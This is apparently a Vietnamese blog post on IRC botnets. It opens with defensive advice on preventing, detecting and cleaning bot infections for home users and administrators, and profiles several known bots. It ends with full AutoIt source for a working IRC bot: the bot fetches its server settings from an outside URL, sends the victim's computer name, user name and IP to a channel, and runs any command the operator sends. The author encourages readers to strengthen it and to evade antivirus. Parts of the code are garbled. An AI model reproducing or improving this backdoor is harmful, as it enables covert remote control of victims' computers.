Đối với người dùng thông thường (Dạng Home user)
Phòng ngừa :
- Tuân thủ các chính sách bảo mật
- Cập nhật các bản vá các phần mềm trên máy
- Tham khảo thông tin cập nhật tại cert.org phần “Home Network Security” http://www.cert.org/tech_tips/home_networks.html đây là những nội dung rất căn bản và hữu ích..
- Bật chế độ tự động cập nhật đối với hệ điều hành và phần mềm ứng dụng [theo CERT, 2001]
- Thao tác an toàn khi truy nhập mail, web, chat,… như không lưu mật khẩu..
- Sử dụng và cập nhật thường xuyên phần mềm diệt virus phổ biến.
- Sử dụng tường lửa và thiết lập các chế độ hợp lý.
Phát hiện :
- Cổng mặc định của IRC là 6667, cổng này có thể bị thay đổi. Dùng lệnh netstat –an trên cả Windows và Linux để kiểm tra các cổng ra vào mà máy tính đang sử dụng.
Ví dụ :
C:/windows> netstat – an
TCP your.mac hine.ip remote.irc.server.ip :6667 ESTABLISHED
Các server IRC có thể lắng nghe trên các cổng 6000-7000.
Đây cũng là cách để phát hiện các phần mềm gián điệp khác.
- Giám sát băng thông, gói tin trên mạng, các cổng kết nối. Có thể có một vài dấu hiệu như mạng chậm, tỉ lệ gói tin gửi đi và nhận được khác thường,…
- Phần mềm chống virus và phần mềm gián điệp có thể phát hiện ra chúng.
- Trong một số trường hợp có thể dùng các chương trình quét trực tuyến của các hang bảo mật lớn. [theo SYMANTEC]
Xử lý:
- Ngắt kết nối mạng của máy bị nhiễm mã độc, để tránh nguy cơ ảnh hưởng đến các máy cùng mạng.
- Cập nhật phần mềm diệt virus, kiểm tra xem nhà cung cấp hệ điều hành, phần mềm có bản vá hay không ?
- Nếu các chương trình diệt virus không phát hiện ra có thể dùng các công cụ hiển thị các tiến trình của máy tính để phát hiện và diệt bằng tay.
- Nếu trên máy có chứa các thông tin nhay cảm như tài khoản ngân hàng thì cần báo ngay cho nơi quản lý thẻ để tạm ngưng sử dụng hoặc nếu là mật khẩu thì cần đổi lại ngay.
- Nếu không xử lý được thì cần nhờ người có kỹ thuật xử lý.
Đối với quản trị hệ thống
Phòng chống:
- Áp dụng các chính sách bảo mật thông dụng.
- Theo hướng dẫn của nhà cung cấp hệ điều hành, phần mềm ứng dụng nâng cấp và cập nhật bản vá.
- Theo dõi thông tin về các lỗ hổng bảo mật trên các trang bảo mật uy tín, nhận thông tin bảo mật từ các mailing list bugtraq.
- Bật chế độ tự động cập nhật đối với hệ điều hành và phần mềm ứng dụng.
- Thao tác an toàn khi truy nhập mail, web, chat,… như không lưu mật khẩu.
- Sử dụng và cập nhật thường xuyên phần mềm diệt virus phổ biến.
- Sử dụng tường lửa và thiết lập các chế độ hợp lý.
- Cài đặt các phần mềm để giám sát hệ thống, phân tích log file hoạt động và truy nhập của hệ thống.
Phát hiện
- Sử dụng các kỹ thật như đối với người dùng thông thường.
- Thường xuyên giám sát log của hệ thống sử dụng, log của hệ thống giám sát, có cơ chế cảnh báo tự động cho người quản trị như gửi mail,…
- Giám sát mạng, dùng tường lửa chặn các cổng không cần thiết. một tiện ích nhỏ cho phép xem các cổng đóng mở ngoài netstat là fport của McAfee:
http://www.foundstone.com/knowledge/proddesc/fport.html
- Phân tích log của phần mềm bắt gói tin có thể phát hiện ra server và kênh bí mật của kẻ tấn công sử dụng, biết được mật khẩu kết nối IRC mã hóa hay không mã hóa.
- Tiến hành quét toàn bộ các máy tình nghi có chứa mã độc, rà soát, tìm và dỡ bỏ backdoor, rootkit.
Xử lý :
- Sử dụng các kỹ thật như đối với người dùng thông thường.
- Cô lập các máy bị nhiễm sang một phân mạng riêng biệt.
- Lưu trữ và giữ an toàn dữ liệu, logs file của Firewalls, Máy chủ Mail , IDS, DHCP, proxy...
- Xử dụng phần mền bắt gói tin để phân tichs cách thức hoạt động của bot, phát hiện các máy bị lây nhiễm, nguồn gốc của nơi phát lệnh,…
- Liên hệ các trung tâm xử lý sự cố máy tính, các trung tâm an ninh mạng để cùng phối hợp giải quyết.
SUMMARY:
Sử dụng mạng IRC để điều khiển zombie vẫn là một xu hướng lớn trong việc phát hiển DDoS bằng IRC botbet nguy hiểm hơn DoS truyền thống rất nhiều.
Số lượng botnet ngày tăng, đồng thời với nó số nút (zombie) của botnet cũng tăng lên. Các botnet ngày càng tinh vi hơn. Các công cụ phát tán cũng tinh vi và nguy hiểm hơn. Đặc biệt là các công cụ được phát triển cho phép tự động phát hiện lỗ hổng và lây nhiễm mã độc.
Mục đích chính của botnet vẫn là DDoS, Spam mail, lấy chộm thông tin cá nhân, làm hệ thống chia sẻ file, phần mềm,…
Sandboxes bảo vệ hệ thống khỏi các mã, phần mềm độc hại.
BONUS:
Một số bot cơ bản
GTbot
Các thông tin thêm về GTbot có thể tham khảo tại http://swatit.org/bots/gtbot.html :
- sử dụng các chương trình mIRC hợp lệ
- dễ dàng viết lại hay chỉnh sửa các nội dung điều khiển
Tên gọi khác: W32.IRCBot,
Cổng (Ports): tự cấu hình
Sử dụng: Truy nhập từ xa / IRC trojan
Registers: HKEY_LOCAL_MACHINE \SOFTWARE \Microsoft \Windows \CurrentVersion\ Run\
Hệ điều hành chịu tác động: Wi ndows 95, 98, ME, NT, 2000, XP.
EvilBot v1.0
Nguồn : http://www.megasecurity.org/trojans/...Evilbot_a.html
Kích thước file nén: 15.904 bytes
Cổng (Ports): mặc định 6667 (có thể thay đổi)
Mục đích sử dụng: Truy nhập từ xa / IRC trojan / Công cụ tấn công DDoS / tải trojan về máy nạn nhân
Registers: HKEY_LOCAL_MACHINE \Software\Microsoft \Windows \CurrentVersion\ Run\ Hệ điều hành chịu tác động: Windows 95, 98, ME, NT, 2000 , XP.
Thông tin thêm:
http://securityresponse.symantec.com...r.evilbot.html
Slackbot
Tên gọi khác : Backdoor.Slackbot, DDOS/Slack, Troj/Slack, Slack,
Cổng (Ports): 6667 (có thể thay đổi)
Files: Slackbot.zip - Slackbot1_0.zip - Zwbv.exe - Sbconfig.exe -
Mục đích sử dụng: Truy nhập từ xa / IRC trojan / Công cụ tấn công DDoS / tải trojan về máy nạn nhân
Registers: HKEY_LOCAL_MACHINE \Software\Microsoft \Windows \CurrentVersion\ Run\ Hệ điều hành chịu tác động: tất cả các phiên bản của hệ điều hành windows cùng với các phần mềm IRC.
Bonet đơn giản viết bằng Autoit (các bạn có thể phát triển cho nó mạnh hơn hehe viết bằng VB đỡ bị các ct anti virus diệt) :
#NoTrayIcon
#include
#include
#include
#include
Global $version = "1"; Cai dat version cho bot
; Nhung thong tin can thiet de bot ket noi toi irc server
InetGet("http://vhc.vn/VHC/Info.php", @WindowsDir&"\server.txt", 1, 0)
Sleep(1000)
$file = FileOpen(@WindowsDir&"\server.txt", 0)
$information = StringSplit(FileRead($file), " ")
FileClose($file)
InetGet("http://cmyip.com/", @WindowsDir&"\ip.txt", 1, 0)
$file2 = FileOpen(@WindowsDir&"\ip.txt", 0)
$get_ip = FileRead($file2)
FileClose($file2)
Global $ip = _checkIP ($get_ip)
Global $server = StringTrimLeft($information[2],7)
Global $port = StringTrimLeft($information[3],5)
Global $nick = "VHC-"&Chr(Random(65,90,1))&Chr(Random(65,90,1))&Chr(Ra ndom(65,90,1))&Chr(Random(65,90,1))&Chr(Random(65, 90,1))&Chr(Random(65,90,1))&Chr(Random(65,90,1))&C hr(Random(65,90,1))
Global $channel = StringTrimLeft($information[4],8)
Global $new_version = StringTrimLeft($information[5],8)
Global $command
TCPStartup ()
Global $sock = _IRCConnect($server, $port, $nick); Ket noi toi IRC va` nhap nick cua bot
While 1
Local $run
local $strtmp
$recv = TCPRecv($sock, 8192); Nhung thong tin nhan duoc tu server IRC
If @error Then $sock = _IRCConnect($server, $port, $nick) ; Neu khong ket noi dc toi server thi server do die roi.
Local $sData = StringSplit($recv, @CRLF); Phan chia tin nhan nhan dc tu server, doi khi server nhom chung lai
For $i = 1 To $sData[0] Step 1; Lam cho tin nhan ngan cach ra
Local $sTemp = StringSplit($sData[$i], " "); Phan chia tin nhan thong qua dau cach
If $sTemp[1] = "" Then ContinueLoop; Neu la rong thi tiep tuc
If $sTemp[1] = "PING" Then TCPSend($sock, "PONG " & $sTemp[2] & @CRLF); Checks for PING replys (There smaller then usual messages so its special!
If $sTemp[0] <= 2 Then ContinueLoop; Useless messages for the most part Switch $sTemp[2]; Splits the command msg Case "PRIVMSG" $user = StringMid($sTemp[1], 2, StringInStr($sTemp[1], "!")-2) $3 = StringMid($sData[$i], StringInStr($sData[$i], ":", 0, 2)+1) $msg = StringSplit($3, " ") Switch $3 Case "Help" _IRCSendMessage($sock, "Dear Master, I will help you remember some command! ^_^", $channel) _IRCSendMessage($sock, "Ready?", $channel) _IRCSendMessage($sock, "ProcessList", $channel) _IRCSendMessage($sock, "Info", $channel) _IRCSendMessage($sock, "Quit", $channel) _IRCSendMessage($sock, "Run [ten ctr]", $channel) Case "Ready?" _IRCSendMessage($sock, "I'm ready! Master AvyErn! ^_^", $channel) Case $msg[1] = "Chat" MsgBox(0, "Message", StringTrimLeft($3, 4), 10) _IRCSendMessage($sock, "OK! -Msg-", $channel) Case "Info" _IRCSendMessage($sock, "Computer Name: "&@ComputerName&" - OS: "&@OSVersion&"/"&@OSServicePack&" - User: "&@UserName&" - IP: "&$ip, $channel) Case "Quit" TCPCloseSocket($sock) Sleep(1000) $sock = _IRCConnect($server, $port, $nick) Case Else $command=Param($3,"Run ",$strtmp) If $command <>"" Then
$run=Run($command,@SystemDir,@SW_SHOWDEFAULT)
If @error Then
_IRCSendMessage($sock, "Command Error! ^_^", $channel)
Else
_IRCSendMessage($sock, "Done!", $channel)
EndIf
EndIf
EndSwitch
Case "266"; It is what I use as an indictator to show when its done sending you info.
_IRCJoinChannel ($sock, $channel)
_IRCChangeMode ($sock, "+i", $nick)
EndSwitch
Next
WEnd
Func Param($str,$strfind,$param)
Local $pos
$pos=StringInStr($str,$strfind)
If $pos =1 Then $param=StringMid($str,StringLen($strfind)+1,(Strin glen($str)-Stringlen($strfind)))
Return $param
EndFunc
Func _checkIP ($temp)
$array_IP = _StringBetween ($temp, "My IP is ", " - ")
Return $array_IP[0]
EndFunc
END.(xong khỏe quá)
Không có nhận xét nào: